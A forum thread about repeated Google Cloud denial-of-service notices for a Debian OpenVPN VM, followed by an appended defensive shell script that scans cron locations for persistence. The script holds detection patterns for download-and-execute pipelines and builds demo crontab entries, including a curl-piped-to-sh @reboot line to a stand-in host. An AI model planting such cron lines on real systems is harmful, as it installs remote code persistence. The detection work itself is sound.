
Repeated GCP Compliance Notifications

I have been on GCP for roughly 3 months now. In those 3 months I have received 6 notices from GCP saying that one of my compute engines is creating a denial of service attack. They provide the IP address of the CE and the time the attack triggered the compliance alert (for this last notice, 2021-11-25 00:10 to 2021-11-25 00:10).

I have taken as many steps as I can possibly take. I have 2 kinds of IDS software installed on the machine (neither has captured any attempts at compromise), and I have a local firewall on the server blocking all inbound and outbound traffic except for traffic specifically required. Additionally, I have taken one last step and used the firewall on GCP to block all inbound and outbound traffic except for traffic specifically required.

I simply do not know where to go from here. It would seem as though these compliance notifications are meant to require me to purchase support so I can discuss this with GCP support staff. Does anyone else have any thoughts before I drop unknown $$$$ at support?

Thank you kindly...


John Hanley:
1) Your first step is to shut down that system - e.g. do it right now.
2) Google will soon suspend that system and/or your account. I am surprised that your system has not already been terminated.
3) Create a snapshot of the disk drive(s), create a new system, and restore the snapshot as an additional disk. Perform forensics to figure out what is wrong.
4) It is unlikely that Google Support can help you. The actual forensics will need to be performed by you or a consultant that has access to the system.
5) If money is a concern, create a new system and reinstall your application.

Asker:
Hi John, I see your point. I'll go ahead and do that to see if anything changes. Having operated an investigation company performing computer forensics for several years, I am certain this machine is not performing any attacks. It's a Debian OpenVPN endpoint; that's its entire purpose. Nothing else has been installed on the machine. OS file hashes for network binaries match documented file hashes by Debian. It's just baffling that they continue to make these claims, then 2 weeks later respond to my objection and tell me everything is fine. They're also never able to provide any details...

John Hanley:
Difficult situation. You have politics, policies, and technology all at play. However, if Google decides your VM is a risk ... I would just create a new VM. Consider this disaster recovery practice for your backup procedures.

John Hanley:
Note: In 100% of the cases I have been involved with (~20), Google was correct. There are a few brilliant hackers out there. Hint: double-check that a trojan is not being launched from CRON.
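A triage script for the two points raised above: step 3 (perform forensics on a disk restored from the snapshot rather than on the live VM) and the cron hint. It walks the standard Debian cron locations under a given filesystem root, so it can be pointed at "/" on the running system or, preferably, at the restored snapshot disk mounted read-only (e.g. /mnt/evidence), and flags entries that match common persistence indicators. This is an added example, not code from the thread or from Google; the indicator patterns (world-writable directories, download-and-execute pipelines, base64-decoded payloads, hidden directories) and the sample crontab entries it builds in a temporary directory are constructed assumptions for demonstration.

```shell
#!/bin/sh
# Added example (not from the thread): scan cron persistence locations under a
# filesystem root for entries that commonly indicate a planted job.
# Usage: sh cron_triage.sh /mnt/evidence     (or no argument for the built-in demo)

# Extended regex of indicators. These are assumed heuristics, not a complete list:
# execution out of world-writable dirs, download-and-execute pipelines,
# base64-decoded payloads, and hidden directories in the command path.
SUSPICIOUS_RE='(/tmp/|/dev/shm/|/var/tmp/|curl[^|]*\|[[:space:]]*(ba)?sh|wget[^|]*\|[[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)|/\.[A-Za-z0-9_-]+/)'

# List every cron file under ROOT: system crontab, cron.d, the run-parts
# directories, and per-user spool files (Debian and non-Debian layouts).
cron_files() {
  root="${1%/}"
  for p in "$root/etc/crontab" "$root/etc/cron.d" "$root/etc/cron.hourly" \
           "$root/etc/cron.daily" "$root/etc/cron.weekly" "$root/etc/cron.monthly" \
           "$root/var/spool/cron/crontabs" "$root/var/spool/cron"; do
    [ -e "$p" ] || continue
    find "$p" -type f 2>/dev/null
  done | sort -u
}

# Print "file:line:text" for each non-comment line matching the indicator regex.
suspicious_cron_lines() {
  cron_files "$1" | while IFS= read -r f; do
    grep -nE "$SUSPICIOUS_RE" "$f" 2>/dev/null \
      | grep -vE '^[0-9]+:[[:space:]]*#' \
      | sed "s|^|$f:|"
  done
}

# Number of flagged lines, for scripting and for the self-check below.
count_suspicious() {
  suspicious_cron_lines "$1" | wc -l | tr -d ' '
}

# Build a constructed evidence tree in a temp dir so the script runs offline.
# Two benign Debian-style entries plus two constructed suspicious ones
# (the URL uses the reserved .invalid TLD; nothing here is real malware).
make_demo_root() {
  d="$(mktemp -d)"
  mkdir -p "$d/etc/cron.d" "$d/var/spool/cron/crontabs"
  printf '17 *\t* * *\troot\tcd / && run-parts --report /etc/cron.hourly\n' > "$d/etc/crontab"
  printf '0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n' > "$d/etc/cron.d/logrotate"
  printf '*/5 * * * * /dev/shm/.x/update\n' > "$d/var/spool/cron/crontabs/root"
  printf '# comment mentioning /tmp/ only\n@reboot curl -s http://example.invalid/p | sh\n' > "$d/etc/cron.d/zz-sync"
  echo "$d"
}

# Stand-alone run: scan the root given as $1, else scan the constructed demo tree.
ROOT_TO_SCAN="${1:-}"
if [ -n "$ROOT_TO_SCAN" ]; then
  suspicious_cron_lines "$ROOT_TO_SCAN"
else
  demo="$(make_demo_root)"
  suspicious_cron_lines "$demo"
  rm -rf "$demo"
fi
```

Running it against the demo tree flags the /dev/shm entry and the curl-pipe-to-sh entry while ignoring the commented-out /tmp mention and the stock run-parts and logrotate jobs. On a mounted evidence disk, pair the hits with file modification times and with the OpenVPN package's known-good file list; a spool crontab for root that the operator never created is exactly the kind of finding the hint above is about.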